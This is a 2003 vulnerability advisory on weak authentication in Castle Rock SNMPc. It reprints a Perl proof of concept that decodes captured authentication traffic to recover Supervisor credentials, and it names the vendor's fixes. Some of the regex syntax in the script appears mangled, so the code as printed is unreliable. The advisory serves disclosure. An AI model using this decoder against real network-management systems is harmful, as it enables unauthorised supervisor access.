Weak Authentication in SNMPc

Reported August 27, 2003 by Alexander V. Nickolenko.

VERSIONS AFFECTED

Castle Rock SNMPc 6.0.8 and earlier

DESCRIPTION

A vulnerability in Castle Rock SNMPc 6.0.8 and earlier can let any remote user gain Supervisor access to the vulnerable system. This vulnerability is a result of a weak authentication protocol.

DEMONSTRATION

The discoverer posted the following code as proof of concept:

#!/usr/bin/perl

$str='.YZ\[\\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz\{|\}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./ !"#$%&\'................................................................................................................................';

while(<>)

\{

   $s="";

   if(/^0130 /)\{

     GETIT: \{

 do \{

       s/^0130 00 00 // if /^0130/;

       s/^xdigit:\{4\} //;

       s/ .*$//ms;

       $s=$s." ".$_;

       last GETIT if ($s =~ / 00/);

     \} while (<>)

\};

     $s=~s/ 00.*$//ms;

     $s=~s/ (xdigit:\{2\}) (xdigit:\{2\})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;

     $s=~s/ (xdigit:\{2\})/ chr(hex($1)) /ige;

     print ":$s:\n";

   \}

 \}

VENDOR RESPONSE

Castle Rock has released fixes for versions 6.0.5 and 6.0.8 and a full version fix for release 5.1.

CREDIT                                                                                                       
Discovered by Alexander V. Nickolenko.